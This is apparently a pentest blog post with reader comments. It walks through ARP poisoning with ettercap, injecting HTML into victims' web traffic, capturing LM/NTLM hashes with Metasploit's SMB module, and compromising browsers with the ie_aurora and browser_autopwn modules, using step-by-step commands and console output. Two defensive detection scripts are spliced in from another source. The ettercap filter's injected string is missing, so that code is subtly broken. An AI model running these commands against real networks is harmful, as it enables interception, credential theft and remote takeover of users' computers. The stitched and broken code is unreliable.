Ettercap + Metasploit – Helping the Aurora Attack


I found a nice trick from Fulfor, based on another trick from Irongeek, that I applied in a pentest using HD Moore's magical Metasploit and its browser_autopwn module, and now I am adding the new Aurora IE Metasploit module to it.

This trick has three parts:

The Ettercap Filter

Based on Irongeek's Fun with Ettercap Filters and Bob Fulfor's article, I created the following ettercap filter:

# Just copy and paste in your terminal.
cat > ch0ks.browser_autopwn.attack.filter << __END
# Requests going to port 80: mangle the Accept-Encoding header so the server
# answers with uncompressed HTML that the second block can search and rewrite.
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-gnidocnE");
      # note: replacement string is same length as original string
      msg("Encoding Taken Care Of...\n");
   }
}
# Responses coming from port 80: insert content right after the opening
# head and body tags so it is the first thing the browser loads.
if (ip.proto == TCP && tcp.src == 80) {
   replace("head>", "head>  ");
   replace("body>", "body>  ");
   msg("Replacement Filter Ran.\n");
}
__END

The string 192.168.123.3:80 is the IP and port where I have the browser_autopwn module waiting for the connection, and I use the head and body tags because I want my injected content to be the first thing the browser loads. Now we compile the filter:

etterfilter -o ch0ks.browser_autopwn.attack.ef ch0ks.browser_autopwn.attack.filter

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA


 12 protocol tables loaded:
	DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth 

 11 constants loaded:
	VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP 

 Parsing source file 'ch0ks.browser_autopwn.attack.filter'  done.

 Unfolding the meta-tree  done.

 Converting labels to real offsets  done.

 Writing output to 'ch0ks.browser_autopwn.attack.ef'  done.

 -> Script encoded into 16 instructions.
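The length-preserving header swap above (Accept-Encoding becomes Accept-gnidocnE) travels all the way to the web server, so it is also the easiest place to detect this kind of in-path filter. The following is an added example, not code from the original post: it scans request headers for names that are unknown but are a letter-for-letter permutation of a standard header. The sample requests are constructed.

```python
# Detect header names rewritten by a length-preserving replace(), the
# fingerprint an in-path ettercap filter leaves on HTTP requests.
# Added example, not part of the original post; sample traffic is constructed.

STANDARD_HEADERS = {
    "Host", "User-Agent", "Accept", "Accept-Encoding", "Accept-Language",
    "Connection", "Cookie", "Referer", "If-Modified-Since", "Cache-Control",
}
# Sorted-letter key for each standard header, so any permutation matches.
_BY_LETTERS = {"".join(sorted(h.lower())): h for h in STANDARD_HEADERS}


def mangled_headers(raw_request):
    """Return [(seen_name, standard_name)] for every header in a raw HTTP
    request whose name is not standard but has exactly the letters of one."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    hits = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name = line.split(":", 1)[0].strip()
        if not name or name in STANDARD_HEADERS:
            continue
        match = _BY_LETTERS.get("".join(sorted(name.lower())))
        if match:
            hits.append((name, match))
    return hits


def scan_requests(requests):
    """requests: iterable of (client_ip, raw_request).
    Returns one alert per mangled header as (client_ip, seen, standard)."""
    alerts = []
    for client_ip, raw in requests:
        for seen, std in mangled_headers(raw):
            alerts.append((client_ip, seen, std))
    return alerts


# Constructed sample: one clean request, one that went through the filter.
SAMPLE_REQUESTS = [
    ("192.168.123.39", "GET / HTTP/1.1\r\nHost: intranet\r\n"
                       "Accept-Encoding: gzip, deflate\r\n\r\n"),
    ("192.168.123.42", "GET / HTTP/1.1\r\nHost: intranet\r\n"
                       "Accept-gnidocnE: gzip, deflate\r\nX-Custom: 1\r\n\r\n"),
]

if __name__ == "__main__":
    for ip, seen, std in scan_requests(SAMPLE_REQUESTS):
        print(f"{ip}: header {seen!r} looks like a mangled {std!r}")
```

Run this on the server side or on a sensor between the LAN and the server; a client behind the poisoned segment never sees its own mangled request.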

Now we start ettercap, performing the ARP poisoning and injecting the HTML code:

ettercap -P smb_down -i eth0 -l logfile-`date +%F-%s` -m msgfile-`date +%F-%s` -T  -M arp:remote -F ch0ks.browser_autopwn.attack.ef  /192.168.123.39,42,33,106,154/ /192.168.123.1/

This command runs ettercap with the smb_down plugin, which forces the connection to use LM authentication, so when the client looks for the \\192.168.5.45\share\pixel.gif file the Metasploit auxiliary/server/capture/smb module waiting there logs the hashes. Ettercap also logs everything to the logfile and msgfile and ARP-poisons between the first group of IPs in // and the second. I really recommend using a small number of IPs plus the gateway to avoid causing a DoS on the network. The -F parameter loads our brand new filter, which injects the HTML code on the fly into the victims' traffic, which is why it is important to include the gateway.
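The arp:remote poisoning above makes one host answer ARP for both the victims and the gateway. As an added example (not code from the original post), this passive check flags the two signals that leaves on the segment: an IP whose MAC changes from the first mapping seen, and one MAC claiming several IPs. The ARP reply records are constructed; the gateway address is assumed to be the one from the ettercap command line.

```python
# Flag ARP poisoning from a stream of ARP replies (timestamp, sender IP,
# sender MAC) as a passive sensor on the LAN would record them.
# Added example, not part of the original post; the replies are constructed.

GATEWAY_IP = "192.168.123.1"   # assumed: gateway used in the post's command

# Constructed sample: clean start, then a second MAC claims gateway and victim.
ARP_REPLIES = [
    (0.0, "192.168.123.1",  "00:11:22:33:44:01"),
    (0.5, "192.168.123.39", "00:11:22:33:44:39"),
    (0.9, "192.168.123.42", "00:11:22:33:44:42"),
    (5.0, "192.168.123.1",  "00:11:22:33:44:aa"),
    (5.1, "192.168.123.39", "00:11:22:33:44:aa"),
]


def detect_arp_poisoning(replies, gateway_ip=GATEWAY_IP):
    """Return a list of (timestamp, kind, detail) alerts.
    'mac-change' : an IP is now claimed by a MAC other than the first seen;
                   a moving gateway mapping is the loudest signal.
    'multi-claim': one MAC answers for more than one IP, which is what
                   poisoning both ends of a conversation looks like."""
    first_mac = {}     # ip -> first MAC seen for it
    ips_per_mac = {}   # mac -> set of IPs it has claimed
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        if ip in first_mac and first_mac[ip] != mac:
            tag = "gateway" if ip == gateway_ip else "host"
            alerts.append((ts, "mac-change",
                           f"{tag} {ip} moved {first_mac[ip]} -> {mac}"))
        first_mac.setdefault(ip, mac)
        claimed = ips_per_mac.setdefault(mac, set())
        if claimed and ip not in claimed:
            names = sorted(claimed | {ip})
            alerts.append((ts, "multi-claim", f"{mac} answers for {names}"))
        claimed.add(ip)
    return alerts


if __name__ == "__main__":
    for ts, kind, detail in detect_arp_poisoning(ARP_REPLIES):
        print(f"t={ts:<4} {kind:<11} {detail}")
```

A static ARP entry for the gateway on the clients, or dynamic ARP inspection on the switch, removes the first signal entirely; the second still shows up in the sensor's view.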

Now we have to start our Metasploit attack. This is not new; I took the idea from Bob Fulfor's article. I am just updating it to work with Metasploit Framework 3 and adding the browser_autopwn or the Aurora attack.

At the time I am writing this article I am using metasploit v3.3.4-dev [core:3.3 api:1.0].

 
#    # ###### #####   ##    ####  #####  #       ####  # ##### 
##  ## #        #    #  #  #      #    # #      #    # #   #   
# ## # #####    #   #    #  ####  #    # #      #    # #   #   
#    # #        #   ######      # #####  #      #    # #   #   
#    # #        #   #    # #    # #      #      #    # #   #   
#    # ######   #   #    #  ####  #      ######  ####  #   #   



       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 324 exploits - 105 auxiliary
+ -- --=[ 217 payloads - 20 encoders - 6 nops
       =[ svn r8286 updated today (2010.01.28)

msf > 

For the following modules you need to work as root, because you need to bind privileged ports such as 80, 135 and 445 for the attack to work. I am using Ubuntu Linux Karmic Koala, but you can use the BackTrack project for this attack.

NTLM or LM Interception.

We start the attack.

sudo msfconsole 
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set  LOGFILE Metasploit139.log
LOGFILE => Metasploit139.log
msf auxiliary(smb) > set  PWFILE Metasploit139.pwd 
PWFILE => Metasploit139.pwd
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.

msf auxiliary(smb) > set  LOGFILE Metasploit445.log            
LOGFILE => Metasploit445.log
msf auxiliary(smb) > set  PWFILE Metasploit445.pwd 
PWFILE => Metasploit445.pwd
msf auxiliary(smb) > set SRVPORT 445 
SRVPORT => 445
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) > 

I run the service on both 139 and 445 because in my experience it improves the chances of catching an authentication hash. Now we have to wait, and with some luck you should see something like:

[*] Received 192.168.0.103:2281 MYDOMAIN\LAMEUSER LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1

This is good, but you can't just use that hash to authenticate, so you have to crack it following the idea from carnal0wnage's blog article Using the Metasploit SMB Sniffer Module. NOTE: the tool halflm_second.rb is in the tools directory inside the Metasploit directory.

Attacking the Browser directly

Now we have to start the browser attack, here with the ie_aurora module:

msf auxiliary(smb) > use windows/browser/ie_aurora     
msf exploit(ie_aurora) > set SRVPORT 80   
SRVPORT => 80
msf exploit(ie_aurora) > set URIPATH /    
URIPATH => /
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/bind_tcp 
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ie_aurora) > show options 

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ie_aurora) > exploit 
[*] Exploit running as background job.
msf exploit(ie_aurora) > 
[*] Started bind handler
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.123.3:80/
[*] Server started.

That's it; now you have to wait for a browser to bite the bait and you get a meterpreter console. This was about the new Aurora Metasploit module because it is the trend of the night, but let's face it, it is just one part of the big world of browser attacks. So if you are just lazy you can use the browser_autopwn module:

msf auxiliary(browser_autopwn) > db_driver  sqlite3                
[*] Using database driver sqlite3
msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.123.3
LHOST => 192.168.123.3
msf auxiliary(browser_autopwn) > set SRVPORT 80  
SRVPORT => 80
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn) > show options  

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST       192.168.123.3    yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Starting exploit modules on host 192.168.123.3...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/IC0F7kIlYh
[*]  Local IP: http://192.168.123.3:80/IC0F7kIlYh
[*] Server started.
...
[*] Starting the payload handler...
[*] Started reverse handler on port 6666
[*] Starting the payload handler...

[*] --- Done, found 15 exploit modules

[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.123.3:80/
[*] Server started.

That's it; now you have to wait for a browser to bite the bait and you get a shell on the computer with the privileges of the user running the browser.

Happy Pentesting

Adrián Puente Z.


About ch0ks

Untamable cybersecurity enthusiast focused on DevOps and automatization. Former Pentester, CTFer, Linux fanboy, full time nerd and compulsive SciFy reader.
This entry was posted in Articles, Hacking, Security.

6 Responses to Ettercap + Metasploit – Helping the Aurora Attack

  1. Pingback: Tweets that mention H4CKarandas » Blog Archive » Ettercap + Metasploit – Helping the Aurora Attack -- Topsy.com

  2. h31180y says:

    That browser_autopwn attack I've been implementing in a Rogue AP attack.
    Your article is still useful to me, because I can implement it in the Aurora
    attack. In your explanation of ettercap and browser_autopwn you make a good interaction with that.
    When you perform the MITM, I can use the Aurora exploit and attack all the IE v6 victims, injecting meterpreter's payload.
    In other versions, 7 and 8, it only crashes.

  3. DjMasta says:

    I really like when people are expressing their opinion and thought. So I like the way you are writing

  4. WP Themes says:

    Genial dispatch and this post helped me a lot in my college assignment. Thank you for your information.

  5. hushdevil says:

    Your blog keeps getting better and better! Your older articles are not as good as newer ones you have a lot more creativity and originality now. Keep it up!
    And according to this article, I totally agree with your opinion, but only this time! :)

  6. Pingback: Sergio Proxy – Injecting, Modifying, and Blocking HTTP Traffic « Spare Clock Cycles
